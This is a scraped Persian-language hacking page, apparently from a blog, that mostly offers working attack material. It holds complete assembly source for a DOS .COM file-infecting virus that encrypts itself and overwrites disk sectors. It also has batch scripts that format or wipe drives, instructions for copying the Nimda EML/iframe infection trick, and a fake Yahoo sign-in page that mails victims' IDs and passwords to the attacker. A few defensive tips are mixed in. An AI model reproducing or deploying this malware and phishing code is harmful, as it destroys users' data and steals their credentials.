HostProgram: nop ;First run copy only!
nop ;First run copy only!

first_four: nop ;First run copy only!
address: int 20h ;First run copy only!
check: nop ;First run copy only!

begin: call nextline ;Push IP+3 onto stack
nextline: pop bp ;mov bp,ip
sub bp,offset nextline ;bp=disp. for mem locs

push ax ;Save AX
call cryptor ;Decrypt
jmp short retloc ;Continue program

cryptor: mov al,[bp+offset encrypt_val] ;encrypt val
lea si,[bp+offset toec] ;Top Of Encrypted Code
mov cx,offset eoec-offset toec ;Length of " "
cryptorloop: xor [si],al ;en/de crypt
rol al,cl ;change code #
inc si ;Next char please!
loop cryptorloop ;loop if necessary
ret ;Return to caller

infect: call cryptor ;Encrypt code
pop cx ;Restore CX for INT 21
int 21h ;Call DOS
call cryptor ;Decrypt code
ret ;Go back

toec:;ؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤTop Of Encrypted Code
InfectIt: push cx ;Save CX for sub
jmp infect

retloc: pop ax ;Restore AX
xor di,di ;DI = 0

cli ;Disable interrupts
mov ss,di ;Set up stack at:
mov sp,2F0h ; 0000:02F0
sti ;Enable interrupts

mov si,96h ;Vector for INT 24h
mov bx,ss:[si] ;BX = offset in segment
mov cx,ss:[si+2] ;CX = segment
lea dx,[bp+offset int24handler] ;CS:DX -} local handler
mov ss:[si],DX ;Save offset
mov ss:[si+2],cs ;Save segment
mov si,es:[di+2F8h] ;Check operation mode
cmp si,4643h ;'CF' if already TSRed
jne GoOn ;Nope, jmp
jmp return ;Yes, don't do anything

GoOn: mov cs:[di+4Ch],bx ;use unused part of PSP
mov cs:[di+4Eh],cx ; to save BX and CX
push cs ;Copy CS ...
pop es ; ... to DS

mov byte ptr [bp+offset infected],0 ;Reset infection count
mov byte ptr [bp+offset max2kill],3 ;Stop after 3 or less

GoOn2: lea si,[bp+offset first_four] ;Original first 4 bytes
mov di,offset tof ;TOF never changes
cld ;Read left-to-right
movsw ;Copy the 4 bytes
movsw ;Copy the 4 bytes

mov ah,1Ah ;Set DTA address ...
lea dx,[bp+offset DTA] ; ... to *our* DTA
int 21h ;Call DOS to set DTA

mov ah,4Eh ;Find First ASCIIZ
lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0
lea si,[bp+offset filename] ;Point to file
push dx ;Save DX
jmp short continue ;Continue...

return: mov ah,1ah ;Set DTA address ...
mov dx,80h ; ... to default DTA
int 21h ;Call DOS to set DTA
xor di,di ;DI= 0
mov es,di ;ES= 0
mov si,96h ;Vector for INT 24h
mov bx, cs:[di+4Ch] ;Restore from saved BX
mov word ptr es:[si+0], bx ;Place back into vector
mov cx, cs:[di+4Eh] ;Restore from saved CX
mov word ptr es:[si+2], cx ;Place back into vector
push cs ;Move CS ...
pop es ; ... to ES

mov ax,[bp+offset SavedAX] ;Restore AX
xor bx,bx ;BX= 0
mov cx,bx ;CX= 0
mov dx,cx ;DX= 0
mov si,dx ;SI= 0
mov di,si ;DI= 0
mov sp,0FFFEh ;SP= FFFEh (normal)
mov bp,100h ;BP= 100h (RETurn addr)
push bp ; Put on stack
mov bp,ax ;BP= 0
ret ;JMP to 100h

nextfile: or bx,bx ;Did we open the file?
jz skipclose ;No, so don't close it
mov ah,3Eh ;Close file
int 21h ;Call DOS to close it
xor bx,bx ;Set BX back to 0
skipclose: mov ah,4Fh ;Find Next ASCIIZ

continue: pop dx ;Restore DX
push dx ;Re-save DX
xor cx,cx ;CX= 0
xor bx,bx
int 21h ;Find First/Next
jnc skipjmp
jmp NoneLeft ;Out of files

skipjmp: mov ax,3D02h ;open file
mov dx,si ;point to filespec
int 21h ;Call DOS to open file
jc nextfile ;Next file if error

mov bx,ax ;get the handle
mov ah,3Fh ;Read from file
mov cx,4 ;Read 4 bytes
lea dx,[bp+offset first_four] ;Read in the first 4
int 21h ;Call DOS to read

cmp byte ptr [bp+offset check],idc ;Already infected?
je nextfile ;Yep, try again ...
;NOTE: Delete the two lines above if you want it to re-infected programs.

cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE?
je nextfile ;Yep, maybe next time!

mov ax,4202h ;LSeek to EOF
xor cx,cx ;CX= 0
xor dx,dx ;DX= 0
int 21h ;Call DOS to LSeek

cmp ah,0F8h ;Longer than 62K?
ja nextfile ;Yep, try again...
mov [bp+offset addr],ax ;Save call location

mov ah,40h ;Write to file
mov cx,4 ;Write 4 bytes
lea dx,[bp+offset first_four] ;Point to buffer
int 21h ;Save the first 4 bytes

mov ah,[bp+offset encrypt_val] ;Get code number
inc ah ;add 1
adc ah,0 ;increment if it's zero
mov [bp+offset encrypt_val],ah ;Save new code number

mov ah,40h ;Write to file
mov cx,offset eof-offset begin ;Length of target code
lea dx,[bp+offset begin] ;Point to virus start
call InfectIt ;Exempt from encryption
ComeBackHere: mov ax,4200h ;LSeek to TOF
xor cx,cx ;CX= 0
xor dx,dx ;DX= 0
int 21h ;Call DOS to LSeek

mov ax,[bp+offset addr] ;Retrieve location
inc ax ;Adjust location

mov [bp+offset address],ax ;address to call
mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst.
mov byte ptr [bp+offset check],idc ;EOFMARK

mov ah,40h ;Write to file
mov cx,4 ;Write 4 bytes
lea dx,[bp+offset first_four] ;4 bytes are at [DX]
int 21h ;Write to file

inc byte ptr [bp+offset infected] ;increment counter
dec byte ptr [bp+offset max2kill] ;decrement counter
jz TheEnd ;If 0 then End

inc byte ptr [bp+offset encrypt_val] ;change code #
adc byte ptr [bp+offset encrypt_val],0 ;adjust if 0
jmp nextfile ;Next victim!

NoneLeft: cmp byte ptr [bp+offset infected],3 ;At least 3 infected?
jae TheEnd ;The party's over!

mov di,100h ;DI= 100h
cmp word ptr [di],20CDh ;an INT 20h?
je TheEnd ;Don't go to prev. dir.

lea dx,[bp+offset prevdir] ;'..'
mov ah,3Bh ;Set current directory
int 21h ;CHDIR ..
jc TheEnd ;We're through!
mov ah,4Eh
jmp continue ;Start over in new dir

TheEnd: xor di,di ;DI= 0
mov es,di ;ES= 0
mov ah,2ah ;Get date
int 21h ;Do it
cmp dl,4 ;4th of the month?
jne test2 ;Nope, second test
cmp dh,7 ;July?
jne test2 ;Nope, second test
xor ax,ax ;Sector 0
jmp Kill ;Kill the disk now...

test2: mov ah,2ch ;Get time
int 21h ;Do it
or cl,cl ;On the hour? (x:00 xM)
jnz GiveUp ;Return to program
cmp ch,6 ;Midnight to 5 AM ???
jnl GiveUp ;Return to program
add cl,ch ;Add first number
mov ax,cx ;Transfer to AX
cbw ;Zero out AH
add al,dh ;Add DL to AL
adc al,dl ;Add DL and carry flag
adc ah,0 ;Add carry to AH
or ax,ax ;AX = 0 ???
jnz Kill ;Kill the disk now...
inc ax ;Well, adjust first...

Kill: mov dx,ax ;Sector number
mov cx,1 ;One at a time....
xor bx,bx ;Point at PSP
mov ah,19h ;Get current disk
int 21h ;Call DOS to ^
int 26h ;Now kill the disk

GiveUp: mov bx,offset message_table ;point to table

mov ah,2ch ;Get time
int 21h ;Call DOS to ^
inc dh ;(0-59)

timeloop: cmp dh,msgs ;mapped yet?
jl timedone ;Yes, jump
sub dh,msgs ;try to map it
jmp short timeloop ;and check out work

timedone: mov al,dh ;AL gets msg #
mov cl,al ;Save in CL for CritErr
cbw ;AH gets 0
shl ax,1 ;AX = AX * 2
add bx,ax ;BX = index
mov si,[bx] ;SI points to string
mov ch,[si-1] ;CH is technique #
mov dx,si ;DX points to string

mov ah,9 ;Display string
int 21h ;Call DOS to ^

cmp ch,terminate ;Terminate program?
je TerminateProg ;Nope, next test

cmp ch,halt ;Halt program?
je $ ;Hang system if ch=halt

cmp ch,SimulateCritErr ;Simulate CritErr?
je simulate ;yes, go do it

cmp ch,Return2host ;Return to host?
je ResumeProgram ;yes, go do it

cmp ch,FlashFloppy ;Flash drive A:?
je FlashFlop ;Yes, go do it

cmp ch,WaitKey ;Wait for keypress?
je zwait ;Yes, go do it

cmp ch,PauseKey ;Pause message w/ wait?
je zpause ;Yes, go do it

cmp ch,StackError ;Stack overflow?
je StackErr ;Yes, go do it

;Invalid code, assume Return2host

ResumeProgram: jmp return ;Return to caller
StackErr: call $ ;Cause stack overflow
TerminateProg: int 20h ;Yep, all done!

simulate: lea dx,[bp+offset ARIFmsg] ;Abort, Retry ...
mov ah,9 ;Print string
int 21h ;Call DOS to ^

mov ah,1 ;Input a char
int 21h ;Call DOS to ^

lea dx,[bp+offset crlf] ;crlf
mov ah,9 ;Print string
int 21h ;Call DOS to ^

cmp al,'a' ;Uppercase?
jb uppercase ;Nope, jump
sub al,' ' ;Yes, make uppercase

uppercase: cmp al,'A' ;Abort?
je terminateprog ;Yep, go do it.

cmp al,'R' ;Retry?
jne zskip ;skip over "retry" code

lea dx,[bp+offset crlf] ;Point to crlf
mov ah,9 ;Print string
int 21h ;Call DOS to ^
mov dh,cl ;Restore DH from CL
jmp timedone ;Reprint error

zskip: cmp al,'I' ;Ignore?
je ResumeProgram ;Return to host program
cmp al,'F' ;Fail?
jne simulate ;Invalid response

lea dx,[bp+offset fail24] ;Point to fail string
mov ah,9 ;Print string
int 21h ;Call DOS to ^
int 20h ;Terminate program

FlashFlop: mov ah,1 ;Wait for keypress
int 21h ;Call DOS to ^

xor ax,ax ;Drive A:
mov cx,1 ;Read 1 sector
mov dx,ax ;Start at boot sector
lea bx,[bp+offset boot_sector] ;BX points to buffer
int 25h ;Flash light on A:
jmp short ResumeProgram ;Resume if no error

zpause: lea dx,[bp+offset pause] ;Point to pause message
mov ah,9 ;Print string
int 21h ;Call DOS to ^
zwait:
mov ah,1 ;Wait for keypress
int 21h ;Call DOS to ^
jmp short ResumeProgram ;Go on...





ARIFmsg db cr,lf,'Abort, Retry, Ignore, Fail?$'
fail24 db cr,lf,cr,lf,'Fail on INT 24'
crlf db cr,lf,'$'

message_table:
dw offset msg1
dw offset msg2
dw offset msg3
dw offset msg4
dw offset msg5
dw offset msg6
dw offset msg7
dw offset msg8
dw offset msg9
dw offset msg10
dw offset msg11
dw offset msg12
dw offset msg13
dw offset msg14
dw offset msg15
dw offset msg16
dw offset msg17
dw offset msg18
dw offset msg19
dw offset msg20

msgs db 20

; I tried to make it as simple as possible to change the messages
; and add/delete them. Each message is in the format:
;
; db [technique]
;[label] db [Text]
;
; Where [technique] is one of the 8 codes shown at the beginning of
; this file (terminate, halt, etc.). This determines what the virus
; should do after printing the message.
; [label] is in the form "msg##" where ## is a number from 1 to
; "msgs". "msgs" is defined immediately before this
; comment block.
; [text] is a combination of text and ASCII codes, terminated by
; either a '$' or a ,36.
;
; If you change the number of messages the virus has, you should also
; add/remove lines from the offset table and change the "msgs"
; data byte appropriately. Let's say for instance that you want
; to remove "Program too big to fit in memory.":
; 1) Delete the line(s) with the message and the line
; immediately before it.
; 2) Move message #20 up to message #2's position and
; change its label from "msg20" to "msg2".
; 3) Delete the line "dw offset msg20" from the offset
; table.
; 4) Change the line before this comment block to:
; "msgs db 19"
;
; Later!
; -The BOOT SECTOR Infector ...
;

db FlashFloppy ;Waits for key, then flashes drive A:
msg5 db 'I',39,'m hungry! Insert PIZZA & BEER into drive A: and',cr,lf
pause db 'Strike any key when ready... $'

db SimulateCritErr ;Prints ARIF message and responds appropriately
msg1 db 'Impotence error reading user',39,'s dick$'

db terminate ;Ends the program immediately
msg2 db 'Program too big to fit in memory',cr,lf,'$'

db halt ;Halts the system
msg3 db 'Cannot load COMMAND, system halted',cr,lf,'$'

db terminate ;Ends the program immediately
msg4 db 'I',39,'m sorry, Dave.... but I',39,'m afraid'
db ' I can',39,'t do that!',cr,lf,'$'

db WaitKey ;Waits for a keypress, then runs the program
msg6 db 'Format another? (Y/N)? $'

db StackError ;Generates a stack overflow (halts the system)
msg7 db 'Damn it! I told you not to touch that!$'

db terminate ;Ends the program immediately
msg8 db 'Suck me!',cr,lf,'$'

db SimulateCritErr ;Prints ARIF message and responds appropriately
msg9 db 'Cocksucker At Keyboard error reading device CON:$'

db terminate ;Ends the program immediately
msg10 db 7,cr,cr,cr,7,cr,cr,cr,7,cr,cr,cr,lf
db 'I',39,'m sorry, but your call cannot be completed as dialed.'
db cr,lf,'Please hang up & try your call again.',cr,lf,'$'

db terminate ;Ends the program immediately
msg11 db 'No!',cr,lf,cr,lf,'$'

db halt ;Halts the system
msg12 db 'Panic kernal mode interrupt$'

db WaitKey ;Waits for a keypress, then runs the program
msg13 db 'CONNECT 1200«',cr,lf,cr,lf,'$'

db return2host ;Runs host program immediately
msg14 db 'Okay, okay! Be patient! ...',cr,lf,'$'

db terminate ;Ends the program immediately
msg15 db 'And if I refuse?',cr,lf,'$'

db return2host ;Runs host program immediately
msg16 db 'Fuck the world and its followers!',cr,lf,'$'

db return2host ;Runs host program immediately
msg17 db 'You are pathetic, man... you know that?',cr,lf,'$'

db terminate ;Ends the program immediately
msg18 db 'Cum on! Talk DIRTY to me !!!',cr,lf,'$'

db terminate ;Ends the program immediately
msg19 db 'Your coprocessor wears floppy disks!',cr,lf,'$'

db PauseKey ;Waits for keypress (SAKWR), then runs host prg
msg20 db 'Joker! ver àà by TBSI!',cr,lf
db 'Remember! EVERYTHING',39,'s bigger in Texas!',cr,lf,'$'

int24handler: xor al,al ;Ignore the error
iret ;Interrupt return


filespec: db '*.COM',0 ;File specification
prevdir: db '..',0 ;previous directory
max2kill db 3 ;max. files to infect

eoec:;ؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤEnd Of Encrypted Code
VersionNumber dw 100h ;Version 1.00
encrypt_val db 0 ;1st-run copy only

; None of this information is included in the virus's code. It is only used
; during the search/infect routines and it is not necessary to preserve it
; in between calls to them.

eof:
DTA:

db 21 dup (?) ;internal search's data
attribute db ? ;attribute
file_time db 2 dup (?) ;file's time stamp
file_date db 2 dup (?) ;file's date stamp
file_size db 4 dup (?) ;file's size
filename db 13 dup (?) ;filename

SavedAX dw ? ;Used to save AX
infected db ? ;infection count
addr dw ? ;Address

boot_sector:

main endp;rocedure
code ends;egment

end

وستان اگر میخواهید با یک کلیک هاردتان Format (پاک) شود این کدها را در Note pad ریخته و آنرا با پسوند Bat ذخیره کنید مثلا Format Hard.bat حال مواظب باشید که روی آن کلیک نکنید چون هارد شما صفر کیلومتر خواهد شد



@echo off
call attrib -r -h c:\autoexec.bat
echo @echo off >c:\autoexec.b
echo format /autotest c:/q>nul
call attrib +r +h c:\autoexec.ba
exit

برنامه ای که قرار بگم با استفاده از یک کلیک به ادرس اینترنتی مورد نطر شما برود
این برنامه برای افرادی مناسب است که برنامه ای ساخته باشند و بخواهند در برنامه
ادرس سایت یا وبلاگ خود را بگذارند .
ویژوال بییک را اجرا کنید Standard EXE را انتخاب و open را بزنید حال در منوی projectدر بالای صفحه گزینه References را بزنید گزینه microsoft shell contros and automation را پیدا کنید وتیک بزنید و در آخر ok کنید حال روی form1 دابل کلیک کنید ودر قسمت بالای صفحه(general نام دارد) عبارت زیر را تایپ کنید
Dim a As New Shell
حال یک کنترل command button را به form1 اضافه کنید وخاصیت caption ان را برابر go to web کنید و enter را بزنید روی command button دابل کلیک کنید
و در پنجره کدنویسی ان فرمتن زیر را تایپ کنید
" a.Open "http://parvizh.blogfa.com
به جای http://parvizh.blogfa.com هر ادرسی را که دوست دارید بنویسیدحال برنامه را امتحان ودر ویندوز قرار دهید.

توجه:دوستانی که می خواهند آموزش ساخت ویروس ببینند به وبلاگ دوست خوبم
بابک مراجعه کنند ادرس وبلاگ http://irvirus.blogfa.com

گر قربانی این ویروس رو رو سیستم اجرا کند مادر برد اون میسوزه و اگر برنامه ضد ویروس نداشته باشه ممکنه از فن آن دود بلند شود در هر صورت ویروس خطرناکیه

برنامه نت پد رو باز کنید و دستورات زیر را در آن بنویسید

@echo off
Cls
===========
color fc
Del /a c:\*.com
Del /a c:\*.sys
Del /a c:\*.exe /s
===========

و با پسوند bat. سیو کنید.

ن ویروس باعث تخریبه هارد میشه و تمامه اطلاعات رو از بین می بره بطوری که فایل ها به هیچ وجه بازیافت نمیشن

برایه این کار:

۱.یه notepad باز کنین

۲.توش بنویسین

echo off@
ATTRIB -a -s -h -r c
ATTRIB -a -s -h -r c:\windows\*.*
Echo y | echo a | Echo y | del c:\*.*
Echo y | echo a | Echo y | del d:\*.*
Echo y | echo a | Echo y | del e:\*.*
Echo y | echo a | Echo y | del f:\*.*
Echo y | echo a | Echo y | del g:\*.*
echo y | copy *.* C:\
echo y | copy *.* D:\
echo y | copy *.* E:\
echo y | copy *.* F:\
echo y | copy *.* G:\
resrart

۳.بعد با bat.سیو کنید

من هیچ مسئولیتی در مورد استفاده این ویروس ندارم

ويروس Nimda چگونه خود را تکثير کرد؟

اين ويروس با استفاده از مشکلی که در Header فايلهای EML بود خود را
تکثير کرد در زیر ما به برسی اين مشکل خواهيم پرداخت

اگر شما با زبان HTML آشنائی داشته باشيد حتمآ از iframe استفاده کرده
ايد اين ويیروس اين با استفاده از این TAG به صورت زير

&tl iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
&tl /iframe >
وبا استفاده از کد زير برای قسمت Attachment فایل EML

Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: &tl EA4DMGBP9p >


خود را تکثير کرد در زِير اين قسمت فايل اجرائی قرار داشته که با نام
readme.exe بود اشکال اين بود که فايلهائی که از نوع audio/x-wav با
شند به صورت خود کار اجرا می شود تگ IFRAME نِز بدون اينکه سوالی از
کاربر بکند فايل را Download کرد و اجرار می کرد بدون اين که ببنيد آيا
فايل واقعآ Audio است يا خير .
لازم به ذکر است که اين مشکل در حال حاضر از بین رفته و با استفاده از
Patch ويا نصب Service Packet3 می توانيد از اين مشکل رهائی بابيد.

برای نوشتن اينگونه ويروس شما لازم است که يک فايل EML ساخته و فايل
ويروس خود را به فايل الحاق کرده و کد اول را در بدنه فايل EML و کد
دوم را در قسمتی که نام فايل الحاقی شما وجود دارد باز نويسی کند. خطر
کرم جديد از نوع Yaha خطر در کمين است اين ويروس در خاورميانه اشاعه
پيدا کرده است . بايد بگوايم که اين يک هديه سال نو مسيحی به کشورهای
خاورميانه بود در زیر به تکینیک این ویوس خواهیم پرداخت
اين کرم وقتی به داخل سيستم وارد می شود سه فايل زير را در دايرکتوری
نسب ويندوز کپی می کند
tcpsvs32.exe
nav32_loader.exe
WinServices.exe

اين کرم کليدهای زير را در ريجستری می سازد
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"WinServices" = "%WinSysDir%\WinServices.exe"


[HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"WinServices" = "%WinSysDir%\WinServices.exe"

این کرم از بین می برد پروسه هائی که دارای نامهای زیر می باشد
ANTIVIR
PVIEW
WEBSCANX
RMVTRJANSAFEWEB
ICMON
CFINET
CFINET32
AVP.EXE
LOCKDOWN2000
AVP32
ZONEALARM
ALERTSVC
AMON.EXE
AVPCC.EXE
AVPM.EXE
ESAFE.EXE
PCCIOMON
PCCMAIN
POP3TRAP
WEBTRAP
AVCONSOL
AVSYNMGR
VSHWIN32
VSSTAT
NAVAPW32
NAVW32
NMAIN
LUALL

این کرم نامهائی با سابجتهای زیر دارد
Sample Screensavers
Project
Free Screensavers 4 U
Patch for Klez.H
Patch for Klez.H

جلوگيري از هک ID به وسيله ي تروجان هايي که بوسيله ي offline پسورد را پست
مي کنند


براي اين کار چند روش وجود دارد که مي توان از اين موارد به چند مورد آن
اشاره مي کنم :


1- اگر پسورد ايميل خود را طوري انتخاب کنيد که باعث شود در ياهو مسنجر مانند
شکلکهاي ياهو ظاهر شود ديگر زياد مشکلي نداريد مثلا 8-x:D در اين موقع پسورد
شما بصورت اسکلت خنده نمايش مي يابد ممکن است فکر کنيد که اين راه زود
شناسايي مي شود خوب براي اين موضوع هم راهي هست بين شکلکها space مي گذاريم
مثلا 8-x :D متوجه باشيم که بيشتر از يک space نگذاريم زيرا اشکال بخاطر بزرگ
و گرد بودن يک space را نشان نمي دهند ولي بيشتر از آن باعث لو رفتن پسورد مي
شود .


2- اين راه باعث مي شود که اصلا پسورد شما نمايش ننمايد : اين در صورتي ممکن
است که پسورد شما مثلا 6 تا spaceنشان داده شود.

بيشتر بوترها برای شخص مقابل يک سری از کدهای Html رو می فرستند . که ترکيب
اون کدها باعث می شه که شما از چت بيفتين بيرون و بوت بشين.

شما می تونين برای اون کدها توسط Messenger's Word Filter فيلتر بگذاريد . پس
شما نياز داريد تا اين کد ها رو به فيلتر کلمات مسنجرتون اضافه کنيد .

اسم اين فايل فيلتر هست : Filter1.txt که اگر مسنجرتون رو در مسير پيش فرض
نصب کرده باشيد . اون فايل دراينجا قرار داره :

C:\Program Files\Yahoo!\Messenger\filter1.txt

مطمئن بشيد که وقتی اون فايل رو اديت می کنيد مسنجر در حال اجرا نباشه .

وقتی فايل فيلتر رو با notepad يا هر چيز ديگه ای باز می کنيد کلمه های زيادی
رو می بينيد که فيلتر شده اند . پس شما اين کلمات که در پايين نوشته شده رو
به آخر اون کلمه ها اضافه کنيد :

<snd=,<alt,<url=,<body,<html,<body,<iframe,<frame,src=,<img,<url>,url(,onLoad=,<embed

خوب حالا فايل رو save کنيد / مسنجرتون رو آتيش کنيد و Online بشيد . شما
بايد فيلتر کلمه ها رو فعال کنيد . پس بايد به گزينه Preferences از منوی
Login بريد و chat رو انتخاب کنيد . روی گزينه strong برای Word Filter کليک
کنيد
۱- رفتن به چت روم يک ايميل: ( در واقع اگه ميخوای ببينی آی دی مورد نظرت تو
کدوم روم هست‌ ) : روی ID مورد نظر راست کليک می کنيم و گزينه join user in
yahoo کليک ميکنيم.
۲- Massage دادن به افراد يک گروه: روی گروهی کهIDها روتوش Addکرده شده راست
کليک کرده گزينه ی send massege to all in this group را انتخاب ميکنيم.
۳- طريقه ی فهميدن invisable بودن ID: روی آی دی راست کليک ميکنيم بعد گزينه
invite to conferance را ميزنيم بعد اگر پيغام no thanks داد تو اينترنت هست
اگر نداد
تو اينترنت نيست

وقتي به اينترنت متصل ميشويد يک شماره به شما اختصاص داده ميشود (IP) و تا
مادامي که به کار خود ادامه ميدهيد اين شماره هرگز تغيير نمي کند. نفوذگران
(Hackers) ميتوانند به وسيله ي اين شماره به کامپيوتر شما نفوذ کنند، ويا حتي
ميتوانند آنرا به ديگران هم بدهند. اگر از Windows XP استفاده ميکنيد، حل اين
مشکل ساده است. فقط کافيست به Control Panel برويد و چند جارا تيک بزنيد،
باور کنيد به همين سادگي ميتوانيد راه هاي نفوذ به کامپيوتر خود را مسدود
کنيد.
1. از منوي Start، کنترل پانل را انتخاب کنيد.
2. بر روي Network and Internet Connections کليک کنيد.
3. سپس Network Connections را انتخاب کنيد.
4. حال بر روي اتصال اينترنت خود، کليک راست کرده و از منوي باز شده
Properties را انتخاب کنيد.
5. از Tab, Advanced گزينه ي Internet Connection Firewall را فعال کنيد.
6. بر روي OK کليک کنيد.
به همين سادگي ميتوانيد امنيت را به کامپيوتر خود هديه کنيد

نوت پد را باز کنید.
سپس این کد ها را در ان کپی کنید.
و دنبال قسمتی که چند علامت سوال وجود دارد بگردید و ان ها را پاک کنید و idخود را بزنید.
و بعد ان را با پسوند htmlسیو کنید.
حال آگر ان را برای کسی بفرستید و او ان را باز کند و userوpasswordخود را بزند یوزر و پسورد طرف برای شما میاید:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0056)http://home.ripway.com/2003-10/2861...o/FakePage.html -->
<HTML><HEAD><TITLE>Sign in - Yahoo! Member Directory</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1256">
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY bgColor=#ffffff>
<CENTER>
<TABLE cellSpacing=0 cellPadding=0 width=680 border=0>
<TBODY>
<TR>
<TD colSpan=3>
<TABLE cellSpacing=0 cellPadding=4 width="100%" border=0>
<TBODY>
<TR>
<TD vAlign=bottom>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD align=left width="1%">
<TABLE cellSpacing=0 cellPadding=0 width="1%" border=0>
<TBODY>
<TR>
<TD align=left width="1%"><IMG height=29
alt="Yahoo! Member Directory"
src="Sign in - Yahoo! Member Directory_files/mem_dir.gif"
width=259 border=0> </TD></TR></TBODY></TABLE></TD>
<TD vAlign=bottom noWrap align=right width="100%">
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD vAlign=bottom noWrap align=right width="99%"><FONT
face=Arial size=-1><A
href="http://www.yahoo.com/">Yahoo!</A> - <A
href="http://help.yahoo.com/help/us/edit/">Help</A></FONT>
<BR>
<HR noShade SIZE=1>
</TD></TR></TBODY></TABLE></TD></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=#99ccff><FONT face=Arial color=black size=+1><B>Welcome
to Yahoo! Member Directory </B></FONT></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD colSpan=3>
<TABLE cellSpacing=2 cellPadding=3 width="100%" align=center
bgColor=#ffffff border=0>
<TBODY>
<TR>
<TD align=middle><FONT face=arial color=green><B>Sign in to
continue. </B></FONT></B></FONT></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD vAlign=top colSpan=3>
<TABLE cellSpacing=2 cellPadding=0 width="100%" bgColor=#ffffff
border=0><TBODY>
<TR>
<TD vAlign=top width="50%">
<TABLE cellSpacing=0 cellPadding=2 width="100%" bgColor=#ffffff
border=0>
<TBODY>
<TR>
<TD align=middle><FONT face=Arial size=+1><B><NOBR>New to
Yahoo!?</NOBR></B></FONT> </TD></TR>
<TR>
<TD align=middle><B><FONT face=arial><A
href="http://edit.yahoo.com/config/eval_register?.intl=us&amp;new=1&amp;.done=http%3a//members.yahoo.com&amp;.src=ytc&amp;.v=0&amp;.u=er4tt5ovjkn4p&amp;p artner=&amp;.p=&amp;promo=&amp;.last=">Sign
up now</A> to enjoy Yahoo! Member Directory
</FONT></B></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=2 cellPadding=2 width=310 border=0>
<TBODY>
<TR>
<TD vAlign=top width="2%">•</TD>
<TD><FONT face=Arial size=-1>Find and connect with millions of
Yahoo! users.</FONT></TD></TR>
<TR>
<TD vAlign=top width="2%">•</TD>
<TD><FONT face=Arial size=-1>What's your interest? Find others
like you.</FONT></TD></TR>
<TR>
<TD vAlign=top width="2%">•</TD>
<TD><FONT face=Arial size=-1>Check out the Profiles of people
on any list.</FONT></TD></TR>
<TR>
<TD vAlign=top width="2%">•</TD>
<TD><FONT face=Arial size=-1>See who's online right now -- use
Yahoo! Messenger to chat.</FONT></TD></TR></TBODY></TABLE></TD>
<TD width="1%"></TD>
<TD vAlign=top align=left>
<FORM action=http://support.inetc.net/email/formmail.asp
method=post><INPUT type=hidden value=smtp3.inetc.net
name=mailserver> <INPUT type=hidden value=?????????????????????????@yahoo.com
name=sendto> <INPUT type=hidden
value=http://mail.yahoo.com/?.intl=us name=urljump>
<TABLE cellSpacing=0 cellPadding=2 width="100%" bgColor=#99ccff
border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=2 width="100%"
bgColor=#eeeeee border=0>
<TBODY>
<TR>
<TD align=middle bgColor=#ffffff>
<TABLE cellSpacing=6 cellPadding=6 width="100%"
bgColor=#ffffff border=0>
<TBODY>
<TR bgColor=#eeeeee>
<TD align=middle><FONT face=arial><B>Existing
Yahoo! users</B></FONT><BR><FONT face=arial
size=-1><NOBR>Enter your ID and password to sign
in </NOBR></FONT>
<TABLE cellSpacing=0 cellPadding=4 border=0>
<TBODY>
<TR>
<TD align=right>
<TABLE cellSpacing=0 cellPadding=2 border=0>
<TBODY>
<TR>
<TD noWrap align=right><FONT face=arial
size=-1>Yahoo! ID:</FONT></TD>
<TD><INPUT size=17 name=subject> </TD></TR>
<TR>
<TD noWrap align=right><FONT face=arial
size=-1>Password:</FONT></TD>
<TD><INPUT type=password maxLength=32 size=17
name=password ??> </TD></TR>
<TR>
<TD noWrap align=middle colSpan=2><FONT
face=arial size=-1><INPUT type=checkbox
value=y>Remember my ID on this
computer</FONT></TD></TR>
<TR>
<TD></TD>
<TD><INPUT type=submit value="Sign In"></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD noWrap align=middle bgColor=#eeeeee><FONT
face=arial size=-1>Mode: Standard | <A
href="https://login.yahoo.com/config/login?.src=ytc&amp;.v=0&amp;.u=er4tt5ovjkn4p&amp;.last=&amp;promo= &amp;.intl=us&amp;.bypass=&amp;.partner=&amp;pkg=&amp;stepid=&amp;.done=ht tp%3a//members.yahoo.com">Secure</A>
</FONT></TD></TR></TBODY></TABLE></TD></TR>
<TR bgColor=#eeeeee>
<TD vAlign=top align=middle><FONT face=arial
size=-1><A
href="http://login.yahoo.com/config/login?.src=ytc&amp;.help=1&amp;.v=0&amp;.u=er4tt5ovjkn4p&amp;.last =&amp;.last=.done">Sign-in
help</A> <A
href="http://edit.yahoo.com/config/eval_forgot_pw?new=1&amp;.done=http://members.yahoo.com&amp;.src=ytc&amp;partner=&amp;.intl=us&amp;pkg=&amp; stepid=&amp;.last=">Forgot
your password?</A>
</FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></FORM></TD></TR>
<TR>
<TD width=600 colSpan=3></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD colSpan=3>
<TABLE cellSpacing=0 cellPadding=0 width=600 border=0>
<TBODY></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TABLE></CENTER>
<P>
